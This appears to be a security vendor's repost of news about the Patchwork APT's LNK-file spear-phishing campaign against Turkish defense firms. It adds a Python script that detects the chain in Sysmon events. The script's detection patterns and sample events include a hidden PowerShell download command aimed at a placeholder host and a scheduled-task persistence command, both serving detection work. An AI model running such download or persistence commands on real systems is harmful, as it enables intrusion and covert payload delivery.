
Patchwork APT Targets Turkish Defense Firms with LNK File Spear-Phishing

Patchwork APT Escalates Operations Targeting Turkish Defense Sector

The notorious threat actor known as Patchwork has launched a sophisticated spear-phishing campaign aimed at Turkish defense contractors, seeking to pilfer strategic intelligence. The campaign leverages malicious LNK files disguised as conference invitations, specifically targeting individuals interested in unmanned vehicle systems, indicating a potential geopolitical motive.


Key Takeaways

  • Patchwork, also identified by multiple other aliases, is believed to be an Indian state-sponsored actor active since at least 2009.

  • The group has expanded its targeting footprint to include Turkish defense firms, coinciding with deepening defense ties between Pakistan and Turkey and recent India-Pakistan military tensions.

  • The attack chain begins with a malicious LNK file that executes PowerShell commands to download further payloads from a compromised server.

  • The campaign utilizes a PDF lure mimicking an international conference on unmanned vehicle systems as a visual decoy.

  • Recent activity shows an evolution in Patchwork's capabilities, moving from x64 DLL variants to x86 PE executables with enhanced command structures.

Sophisticated Attack Chain Unveiled

The campaign uses a five-stage execution chain that starts with malicious LNK files. These files are distributed via phishing emails, disguised as invitations to a conference focused on unmanned vehicle systems. The primary objective is to gather strategic intelligence from entities involved in Turkey's growing defense industry, including a manufacturer of precision-guided missile systems.

Geopolitical Motivations Suspected

Security researchers suggest the timing of this campaign aligns with significant geopolitical developments. Turkey's prominent position in the global UAV export market, its development of critical hypersonic missile capabilities, and its strengthening defense cooperation with Pakistan, all against a backdrop of heightened India-Pakistan tensions, are seen as potential drivers for Patchwork's renewed focus.

Evolution of Patchwork's Tactics

Patchwork, also known by aliases such as APT-C-09, Dropping Elephant, and Zinc Emerson, has a history of targeting entities in South Asia. However, this latest campaign signifies an expansion of its operational scope. The group has demonstrated a significant evolution in its capabilities, transitioning from x64 DLL variants to more advanced x86 PE executables. This diversification, coupled with enhanced command and control (C2) protocols that impersonate legitimate websites, highlights the actor's continued investment and development.

Technical Execution Details

The initial LNK file triggers PowerShell commands to download additional payloads from an external server. A PDF document, designed to look like an international conference invitation on unmanned vehicle systems, serves as a visual decoy. While the user is distracted by the PDF, the malicious execution chain silently proceeds in the background. This chain involves downloading a malicious DLL, which is then executed via DLL side-loading through a scheduled task. Ultimately, shellcode is deployed to conduct extensive reconnaissance, including taking screenshots and exfiltrating data back to the attacker-controlled server.
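The chain described above and in the key takeaways leaves a recognisable footprint in endpoint telemetry: a shell spawned by Explorer (what a double-clicked LNK produces) running a download cradle, a scheduled task whose action points into a user-writable directory, and a system-named DLL loaded from that same directory. The following triage script is an added example, not code from the article, The Hacker News, or any vendor. It scores constructed, Sysmon-style event records (EventID 1 process creation with Image, ParentImage, CommandLine; EventID 7 image load with Image, ImageLoaded); the rule names, scores, pattern lists, sample paths and the `example.invalid` URL are assumptions made for illustration, not published indicators.

```python
"""Triage heuristics for an LNK -> PowerShell -> scheduled task -> DLL side-load chain.

Added example; field names follow Sysmon, everything else is assumed.
"""
import re
from dataclasses import dataclass

# Fragments commonly seen in PowerShell download cradles (assumed list).
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient",
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    r"-w(indowstyle)?\s+hidden",
)]
# Directories a standard user can write to; payloads staged there are suspicious.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|ProgramData|Temp|Public)\\", re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# DLL names that ship in System32; a same-named DLL beside a user-directory EXE is a classic side-load sign.
SYSTEM_DLLS = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptbase.dll", "userenv.dll"}


@dataclass(frozen=True)
class Finding:
    rule: str
    score: int
    detail: str


def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _dir(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower()


def rule_explorer_cradle(ev):
    """EID 1: a shell spawned by Explorer running a download cradle (LNK double-click pattern)."""
    if ev.get("EventID") != 1 or _base(ev["Image"]) not in SHELLS:
        return None
    if _base(ev.get("ParentImage", "")) != "explorer.exe":
        return None
    hits = [p for p in CRADLE_PATTERNS if p.search(ev.get("CommandLine", ""))]
    if not hits:
        return None
    return Finding("explorer_spawned_download_cradle", 40 + 15 * len(hits), ev["CommandLine"])


def rule_task_from_user_dir(ev):
    """EID 1: schtasks /create whose action (/tr) runs a binary from a user-writable path."""
    if ev.get("EventID") != 1 or _base(ev["Image"]) != "schtasks.exe":
        return None
    cl = ev.get("CommandLine", "")
    m = re.search(r'/tr\s+"?([^"]+?)"?(?:\s+/|$)', cl, re.IGNORECASE)
    if not re.search(r"/create\b", cl, re.IGNORECASE) or not m:
        return None
    if not USER_WRITABLE.search(m.group(1)):
        return None
    return Finding("scheduled_task_runs_from_user_dir", 35, m.group(1))


def rule_sideload(ev):
    """EID 7: a system-named DLL loaded from the loading process's own user-writable directory."""
    if ev.get("EventID") != 7:
        return None
    loaded = ev.get("ImageLoaded", "")
    if _base(loaded) not in SYSTEM_DLLS or not USER_WRITABLE.search(loaded):
        return None
    if _dir(loaded) != _dir(ev.get("Image", "")):
        return None
    return Finding("dll_sideload_from_user_dir", 50, loaded)


RULES = (rule_explorer_cradle, rule_task_from_user_dir, rule_sideload)


def triage(events):
    """Run every rule over every event; return findings, highest score first."""
    findings = [f for ev in events for r in RULES if (f := r(ev))]
    return sorted(findings, key=lambda f: f.score, reverse=True)


def chain_score(events):
    """Aggregate score: distinct rules that fired add up, repeat hits of one rule do not."""
    best = {}
    for f in triage(events):
        best[f.rule] = max(best.get(f.rule, 0), f.score)
    return sum(best.values())


# Constructed sample events imitating the described chain (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/invite.pdf','invite.pdf')\""},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'schtasks /create /tn Updater /tr "C:\Users\alice\AppData\Roaming\upd\legit.exe" /sc minute /mo 5'},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Roaming\upd\legit.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\upd\version.dll"},
    # Benign noise: Explorer launching PowerShell with no cradle, and a task from Program Files.
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /create /tn Backup /tr "C:\Program Files\Backup\bk.exe" /sc daily'},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.score:3d} {f.rule:36s} {f.detail}")
    print("chain score:", chain_score(SAMPLE_EVENTS))
```

Each rule on its own is noisy (Explorer launches PowerShell legitimately, and users schedule tasks from AppData), which is why `chain_score` rewards distinct rules firing on the same host rather than any single hit; in practice the three events would be joined on host and a short time window before the aggregate is alerted on.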

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

  • Patchwork Targets Turkish Defense Firms with Spear-Phishing Using Malicious LNK Files, The Hacker News.
